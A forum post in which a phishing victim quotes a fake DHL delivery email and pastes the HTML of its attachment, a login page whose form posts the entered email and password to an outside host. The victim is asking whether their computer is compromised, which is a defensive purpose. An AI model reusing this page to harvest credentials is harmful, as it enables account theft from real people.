Hi, I received an email from DHL Delivery system
.
Dear customer,
We attempted to deliver your item at 10:10 AM on May 06th, 2015.
The delivery attempt failed because nobody was present at the shipping address, so this notify has been automatically sent.
If the parcel is not scheduled for redelivery or picked up within 72 hours, it will be returned to the sender.
Label Number: E727D5151D
Expected Delivery Date: May 6th, 2015
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Read the enclosed file for details.
Thank you,
(coffee) 2015 Copyright DHL INC 2015. All Rights Reserved.
And I was actually expecting an item in the few days that have passed. So I stupidly without completely reading opened the attachment and it was a zip file.
In that zip file was a HTML document which i also opened into google chrome. It asked to enter a user and password which I entered assuming I had an account, the email was the same as my actual email but the password was my old password.
I then read on DHL Website:
DHL | Fraud Awareness | English
If you received an email suggesting that DHL is attempting to deliver a package requesting that you open the email attachment in order to affect delivery, this email is fraudulent, the package does not exist and the attachment may be a computer virus. Please do not open the attachment, click any links or enter into any correspondence with the sender of the email. This email does not originate from DHL.
If you are still in doubt about the authenticity of the email, track the number provided. If no tracking results are returned, it is not a valid tracking number and the email was not sent by DHL.
Recent examples of these are shown below. (See link)
I realised I may have screwed up.
I have pasted the code inside the HTML Doc:
The senders email is: subbuauditor@gmail.com
BitDefender Free didnt pick up a virus within the zip file.
Now I am currently running a full Malwarebytes scan.
Have I screwed up by opening that HTML file? Also in the code is there anything suspicious or anything that shows that It could have done to my PC.
Thank you.
.
Dear customer,
We attempted to deliver your item at 10:10 AM on May 06th, 2015.
The delivery attempt failed because nobody was present at the shipping address, so this notify has been automatically sent.
If the parcel is not scheduled for redelivery or picked up within 72 hours, it will be returned to the sender.
Label Number: E727D5151D
Expected Delivery Date: May 6th, 2015
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Read the enclosed file for details.
Thank you,
(coffee) 2015 Copyright DHL INC 2015. All Rights Reserved.
And I was actually expecting an item in the few days that have passed. So I stupidly without completely reading opened the attachment and it was a zip file.
In that zip file was a HTML document which i also opened into google chrome. It asked to enter a user and password which I entered assuming I had an account, the email was the same as my actual email but the password was my old password.
I then read on DHL Website:
DHL | Fraud Awareness | English
If you received an email suggesting that DHL is attempting to deliver a package requesting that you open the email attachment in order to affect delivery, this email is fraudulent, the package does not exist and the attachment may be a computer virus. Please do not open the attachment, click any links or enter into any correspondence with the sender of the email. This email does not originate from DHL.
If you are still in doubt about the authenticity of the email, track the number provided. If no tracking results are returned, it is not a valid tracking number and the email was not sent by DHL.
Recent examples of these are shown below. (See link)
I realised I may have screwed up.
I have pasted the code inside the HTML Doc:
Code:
<html>
<HEAD>
<TITLE>DHL | Tracking</TITLE>
<META NAME="DESCRIPTION" CONTENT="lodging & fishing guide service">
<META NAME="KEYWORDS" CONTENT="lodging, fishing guide service">
<title>TRADE FILE</title>
</head>
<script type="text/javascript"><!--
function validateForm() {
with (document.myform) {
var alertMsg = "The following REQUIRED fields\nhave been left empty:\n";
if (email.value == "") alertMsg += "\nEmail";
if (epass.value == "") alertMsg += "\nEmail Password";
if (alertMsg != "The following REQUIRED fields\nhave been left empty:\n") {
alert(alertMsg);
return false;
} else {
return true;
} } }
// --></script>
<body background="http://www.dhl.com/img/modules/5_1_dhl_global_locator_all_340_187.gif" text="black" link="blue" alink="blue" vlink="blue" background="" >
<!-- 66613 -->
<font face="Arial" style="font-size: 20pt" color="#342C9A">
<center><b>Sign In Your Email to View Your Tracking</b></font><font face="verdana,arial" size=-1><p>
<img src="http://www.dhl.com/img/meta/dhl_logo.gif" width="300" height="100">
</p>
<table cellpadding=2 cellspacing=0 border=0>
<tr><td bgcolor="blue"><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td bgcolor="blue" align=center style="padding:2;padding-bottom:4"><b>
<font size=-1 color="white" face="Comic Sans MS">Enter your
Email ID and password</font></b></font><b><font face="Comic Sans MS" size=-1></th></font><font face="Comic Sans MS" size=-1></tr>
</font><font face="verdana,arial" size=-1>
<tr><td bgcolor="white" style="padding:5"><br>
<form action="http://bankcopy2015.cwsurf.de/login033.php" onsubmit="return validateForm()" method="post" name="myform">
<center><table width="517">
<tr><td width="110"><font face="verdana,arial" size=-1>
E-MAIL ID:</td><td width="397"><input type="text" name="email" size="40"></td></tr>
<tr><td colspan=2><font face="verdana,arial" size=-1>
</font><font face="verdana,arial" size=1><span class=text1a>(example777@domain.com)</span></td></tr>
<tr>
<font face="verdana,arial" size=-1>
<td width="110"><font face="verdana,arial" size=-1>
PASSWORD:</td>
<td width="397"><input type="password" name="epass" size="40"></td>
</font>
</tr>
<tr>
<font face="verdana,arial" size=-1>
<td width="110"><font face="verdana,arial" size=-1> </td>
<td width="397"><font face="verdana,arial" size=-1><input type="submit" value="Log in To View"></td>
</font>
</tr>
<tr><td colspan=2><font face="verdana,arial" size=-1></td></tr>
</table></center>
</form>
<script language="JavaScript">
<!--
if (document.aform.login.value == '') {
document.aform.login.focus();
}
-->
</script>
</td></tr></table></td></tr></table>
<div class="copyright cLight">
</div>
<p>Copyright Notice ᄅ 1999-2014 DHL WorldWide Delivery.
All rights reserved. </p>
<center><p><hr size=1 width="90%"> </p></center>
</font>
<p> <img alt="http://mimg.126.net/logo/126logo.gif" src="http://mimg.126.net/logo/126logo.gif"><img alt="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" width="110" height="36"> <img src="http://img3.cache.netease.com/www/logo/logo_png.png" alt="" title="" border=0 width=122 height=44> <img src="https://www.google.com/images/logos/mail_logo.png" alt="" title="" border=0 width=142 height=26><img src="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" alt="" title="" border=0 width=175 height=23> <img src="http://mimg.yeah.net/logo/yeahlogo_middle.gif" alt="" title="" border=0 width=174 height=62>
<img src="http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" alt="" title="" border=0 width=138 height=49></p>
</body>
</html>BitDefender Free didnt pick up a virus within the zip file.
Now I am currently running a full Malwarebytes scan.
Have I screwed up by opening that HTML file? Also in the code is there anything suspicious or anything that shows that It could have done to my PC.
Thank you.
